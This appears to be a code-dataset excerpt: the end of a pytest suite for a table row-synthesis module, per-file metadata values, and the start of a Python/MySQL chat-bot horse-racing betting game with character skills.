{alloc_id: ['b', 'c', 'c', 'c', None],
count: df[count]}))
def test_remove_rows(seed, df, alloc_id, count):
num = 2
result = syn._remove_rows(df, num)
assert len(result) == len(df) - num
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['b', 'c', 'b'],
count: [2, 3, 4]},
index=[1, 2, 3]))
def test_remove_rows_noop(seed, df):
num = 0
result = syn._remove_rows(df, num)
assert len(result) == len(df) - num
pdt.assert_frame_equal(result, df)
def test_add_rows_noop(seed, df):
num = 0
result = syn._remove_rows(df, num)
assert len(result) == len(df) + num
pdt.assert_frame_equal(result, df)
def test_add_rows(seed, df, alloc_id, count, constraint):
num = 3
result = syn._add_rows(df, num, alloc_id, constraint)
assert len(result) == len(df) + num
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
count: [1, 2, 3, 4, 5, 5, 1, 4]}))
def test_add_rows_stuff(seed, df, alloc_id, count, constraint):
num = 5
stuff = True
result = syn._add_rows(df, num, alloc_id, constraint, stuff=stuff)
assert len(result) == len(df) + num
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
def test_add_rows_no_stuff(seed, df, alloc_id, count, constraint):
num = 5
stuff = False
result = syn._add_rows(df, num, alloc_id, constraint, stuff=stuff)
assert len(result) == len(df) + num
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
def test_remove_rows_by_count_noop(df, count):
amount = 0
result = syn._remove_rows_by_count(df, amount, count)
assert result[count].sum() == df[count].sum()
pdt.assert_frame_equal(result, df)
def test_remove_rows_by_count(df, count, alloc_id):
amount = 10
result = syn._remove_rows_by_count(df, amount, count)
assert result[count].sum() == df[count].sum() - amount
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['b', 'c'],
count: [2, 3]},
index=[1, 2]))
def test_add_rows_by_count_noop(df, count, alloc_id, constraint):
amount = 0
result = syn._add_rows_by_count(df, amount, count, alloc_id, constraint)
assert result[count].sum() == df[count].sum()
pdt.assert_frame_equal(result, df)
def test_add_rows_by_count(df, count, alloc_id, constraint):
amount = 8
result = syn._add_rows_by_count(df, amount, count, alloc_id, constraint)
assert result[count].sum() == df[count].sum() + amount
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5, 5, 3]}))
def test_add_rows_by_count_stuff(df, count, alloc_id, constraint):
amount = 18
stuff = True
result = syn._add_rows_by_count(
df, amount, count, alloc_id, constraint, stuff=stuff)
assert result[count].sum() == df[count].sum() + amount
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a', 'b'],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, 3]}))
def test_add_rows_by_count_no_stuff(df, count, alloc_id, constraint):
amount = 18
stuff = False
result = syn._add_rows_by_count(
df, amount, count, alloc_id, constraint, stuff=stuff)
assert result[count].sum() == df[count].sum() + amount
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: [
'a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None, None],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, 3]}))
def test_add_or_remove_rows_noop(seed, df, alloc_id, count, constraint):
target = len(df)
result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
assert len(result) == target
pdt.assert_frame_equal(result, df)
def test_add_or_remove_rows_add(seed, df, alloc_id, count, constraint):
target = 8
result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
count: [1, 2, 3, 4, 5, 5, 1, 4]}))
def test_add_or_remove_rows_add_stuff(seed, df, alloc_id, count, constraint):
target = 10
stuff = True
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, stuff=stuff)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
def test_add_or_remove_rows_add_no_stuff(
seed, df, alloc_id, count, constraint):
target = 10
stuff = False
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, stuff=stuff)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
def test_add_or_remove_rows_remove(seed, df, alloc_id, count, constraint):
target = 3
result = syn._add_or_remove_rows(df, target, alloc_id, constraint)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['b', 'c', 'b'],
count: [2, 3, 4]},
index=[1, 2, 3]))
def test_add_or_remove_rows_count_noop(seed, df, alloc_id, count, constraint):
target = df[count].sum()
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(result, df)
def test_add_or_remove_rows_count_add(seed, df, alloc_id, count, constraint):
target = 18
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b'],
count: [1, 2, 3, 4, 5, 3]}))
def test_add_or_remove_rows_count_add_stuff(
seed, df, alloc_id, count, constraint):
target = 30
stuff = True
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
def test_add_or_remove_rows_count_add_no_stuff(
seed, df, alloc_id, count, constraint):
target = 30
stuff = False
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
def test_add_or_remove_rows_count_remove(
seed, df, alloc_id, count, constraint):
target = 10
result = syn._add_or_remove_rows(
df, target, alloc_id, constraint, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b'],
count: [1, 2, 3, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_noop(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 5
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr)
assert len(result) == target
pdt.assert_frame_equal(result, df)
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 8
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
count: [1, 2, 3, 4, 5, 5, 1, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_filters(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 3
filters = '{} < 2'.format(count)
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
filters=filters, constraint_expr=constraint_expr)
assert len(result.query(filters)) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5, 1, 1]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 10
stuff = True
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, stuff=stuff)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_no_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 10
stuff = False
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, stuff=stuff)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_remove(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 3
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr)
assert len(result) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['b', 'c', 'b'],
count: [2, 3, 4]},
index=[1, 2, 3]))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_remove_filters(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 1
filters = '{} > 3'.format(count)
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
filters=filters, constraint_expr=constraint_expr)
assert len(result.query(filters)) == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'c'],
count: [1, 2, 3, 5]},
index=[0, 1, 2, 4]))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_noop(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = df[count].sum()
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(result, df)
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 18
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b'],
count: [1, 2, 3, 4, 5, 3]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_filters(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 18
filters = '{} > 3'.format(count)
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
filters=filters, constraint_expr=constraint_expr, count=count)
assert result.query(filters)[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5, 5, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 30
stuff = True
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
count=count, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_no_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 30
stuff = False
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
count=count, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_remove(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 10
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b'],
count: [1, 2, 3, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_remove_filters(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 2
filters = '{} < 3'.format(count)
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
filters=filters, constraint_expr=constraint_expr, count=count)
assert result.query(filters)[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['b', 'c', 'b', 'c'],
count: [2, 3, 4, 5]},
index=[1, 2, 3, 4]))
def test_synthesize_one_27bug(
alloc_id, count, constraint_df, constraint_units):
# this triggers a bug where things aren't adding up when counting
# values in the count column and filtering on the count column
df = pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5, 5, 1]})
target = 27
filters = '{} > 3'.format(count)
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters, count=count, stuff=False)
assert result.query(filters)[count].sum() == target
def test_synthesize_from_table(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_scaled, constraint_expr):
targets = pd.DataFrame(
{'target_value': [7, 27, 1, 1],
'geo_id_col': [alloc_id] * 4,
'filters': [
np.nan,
'{} > 3'.format(count),
'{} == "a",{} == 1'.format(alloc_id, count),
'{} == 1'.format(count)],
'count': [np.nan, count, np.nan, count],
'capacity_col': [
constraint_units, np.nan, constraint_units, constraint_units],
'capacity_expr': [np.nan, constraint_expr, np.nan, constraint_expr],
'stuff': [np.nan, False, True, True]})
result = syn.synthesize_from_table(df, constraint_df, targets)
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 5, 4, 4]},
index=[0, 1, 2, 3, 4, 5, 7, 8, 9]))
| 29.376486
| 79
| 0.594073
| 2,979
| 22,238
| 4.200403
| 0.040953
| 0.071046
| 0.077439
| 0.014065
| 0.906497
| 0.880524
| 0.849996
| 0.82722
| 0.803804
| 0.791577
| 0
| 0.020322
| 0.263153
| 22,238
| 756
| 80
| 29.415344
| 0.743317
| 0.005576
| 0
| 0.768959
| 0
| 0
| 0.027
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 1
| 0.091711
| false
| 0
| 0.008818
| 0.014109
| 0.116402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db35bebae58e3c096f83118941d808f5719cf3d7
| 59,497
|
py
|
Python
|
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
import pymysql
from DBUtils.PooledDB import PooledDB
import random
from basefunction import get_nick_name
from config import *
def calculate_damage(attack, defense, damage_fix):
dmg = attack + damage_fix - defense
if dmg > 0:
base_move = dmg // 6
extra_move = dmg % 6
r = random.randint(1, 6)
if r <= extra_move:
move = base_move + 1
else:
move = base_move
else:
move = 0
return move
class HorseRace:
def __init__(self):
self.db_pool = PooledDB(creator=pymysql, host=DB_HOST, port=DB_PORT, user=DB_USER, password=DB_PWD,
database='horserace', blocking=True, ping=0)
async def race_state(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select state from race_state"
cursor.execute(sql)
state = cursor.fetchone()
cursor.close()
db.close()
return state[0]
async def set_state(self, state):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update race_state set state = %s" % state
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
async def add_winner(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update chara_data set win_time = win_time + 1 where name = %s"
cursor.execute(sql, chara_name)
db.commit()
cursor.close()
db.close()
async def add_race(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update chara_data set race_time = race_time + 1 where name = %s"
cursor.execute(sql, chara_name)
db.commit()
cursor.close()
db.close()
async def join_gamble(self, player_id, horse_id):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "insert into gamble(player_id, horse_id) values (%s, %s)" % (player_id, horse_id)
try:
result = cursor.execute(sql)
db.commit()
except BaseException:
result = 0
cursor.close()
db.close()
return result
async def search_gamble(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from gamble"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def end_race(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "truncate table gamble"
cursor.execute(sql)
sql = "truncate table horse"
cursor.execute(sql)
sql = "update race_state set state = -1"
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
async def win_rate_stat(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select name, win_time, race_time, if(race_time = 0, 0, win_time / race_time) as win_rate from chara_data where stars >= 2 order by win_rate"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def get_chara_data(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from chara_data where name = %s"
cursor.execute(sql, chara_name)
chara = cursor.fetchone()
cursor.close()
db.close()
return chara
async def add_horse(self, chara):
chara_name = chara[1]
player_id = chara[2]
db = self.db_pool.connection()
cursor = db.cursor()
chara_new = await self.get_chara_data(chara_name)
sql = "insert into horse(name, player_id, atk, satk, def, sdef, tp) values (%s, %s, %s, %s, %s, %s, %s)"
log = (chara_name, player_id, chara_new[3], chara_new[4], chara_new[5], chara_new[6], chara_new[7])
cursor.execute(sql, log)
db.commit()
cursor.close()
db.close()
async def search_horse(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by id"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def search_sorted_horse(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by position desc"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def search_sorted_horse_ascend(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by position"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def get_single_target(self, horse):
horse_list = await self.search_sorted_horse()
first_horse = horse_list[0]
for target_horse in horse_list:
if target_horse[0] != horse[0] and target_horse[3] == first_horse[3]:
return target_horse
return first_horse
async def search_horse_by_position(self, position):
horse_list = await self.search_sorted_horse()
return horse_list[position - 1]
async def get_horse_position(self, horse):
horse_list = await self.search_sorted_horse()
for i in range(len(horse_list)):
if horse_list[i][0] == horse[0]:
return i + 1
async def search_horse_by_player(self, player_id):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse where player_id = %s"
cursor.execute(sql, player_id)
result = cursor.fetchone()
cursor.close()
db.close()
return result
async def move_horse(self, horse_id):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse where id = %s"
cursor.execute(sql, horse_id)
result = cursor.fetchone()
atk = max(result[5], result[6])
position = result[3]
tp = result[4]
tp_up = result[9]
base_move = atk // 6
extra_move = atk % 6
r = random.randint(1, 6)
if r <= extra_move:
move = base_move + 1
else:
move = base_move
position = min(position + move, 10)
tp = min(100, tp + 20 + tp_up * 10)
sql = "update horse set position = %s, current_tp = %s where id = %s"
log = (position, tp, horse_id)
cursor.execute(sql, log)
db.commit()
cursor.close()
db.close()
return move
async def god_attack(self, group_id):
db = self.db_pool.connection()
cursor = db.cursor()
god_atk = 7
response = ""
attack = ("物理", "魔法")
horse_list = await self.search_horse()
attack_mode = random.randint(0, len(horse_list) + 3)
attack_type = random.randint(0, 1)
if attack_mode <= 3:
for horse in horse_list:
response += "上帝对%s号马%s的%s发动了%s攻击," % (horse[0], await get_nick_name(group_id, horse[2]), horse[1], attack[attack_type])
move = calculate_damage(god_atk, horse[7 + attack_type], 0)
if move > 0:
response += '击退了%s步。\n' % move
else:
response += '没有效果。\n'
position = max(1, horse[3] - move)
sql = "update horse set position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
else:
target = attack_mode - 3
horse = horse_list[target - 1]
response += "上帝对%s号马%s的%s发动了%s攻击," % (horse[0], await get_nick_name(group_id, horse[2]), horse[1], attack[attack_type])
move = calculate_damage(god_atk, horse[7 + attack_type], 1)
if move > 0:
response += '击退了%s步。\n' % move
else:
response += '没有效果。\n'
position = max(1, horse[3] - move)
sql = "update horse set position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
return response
async def ub(self, horse, group_id):
db = self.db_pool.connection()
cursor = db.cursor()
if horse[1] == "镜华":
response = "%s号马%s的%s使用了【太虚苍蓝闪】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "杏奈":
response = "%s号马%s的%s使用了【罗刹涅槃・极光终天冥坏破】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 3
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 0, sdef = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "真步":
response = "%s号马%s的%s使用了【童话之庭】!自己的双防上升了!tp中度恢复了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 40, def = 9, sdef = 7, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "璃乃":
response = "%s号马%s的%s使用了【箭雨】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
r = random.randint(0, 1)
if r <= 0:
damage_fix = 3
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "初音":
response = "%s号马%s的%s使用了【流星☆】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = 0
if target_horse[5] > 0:
damage_fix = 3
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "依绪":
response = "%s号马%s的%s使用了【心形love风暴】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(max(target_horse[5], target_horse[6], horse[6]), target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "咲恋":
response = "%s号马%s的%s使用了【不死鸟之剑】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = await self.get_horse_position(horse)
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "望":
response = "%s号马%s的%s使用了【Live-Onstage】!自己的双防提升了!自己的攻击提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
sql = "update horse set current_tp = 0, def = 10, sdef = 6, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "扇子":
response = "%s号马%s的%s使用了【忍法灼热地狱】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
tp_up = 0
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
tp_up += 20
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = %s where id = %s" % (tp_up, horse[0])
cursor.execute(sql)
elif horse[1] == "真琴":
response = "%s号马%s的%s使用了【沃尔芬之咬】!目标的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
def_fix = 0
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
def_fix = 2
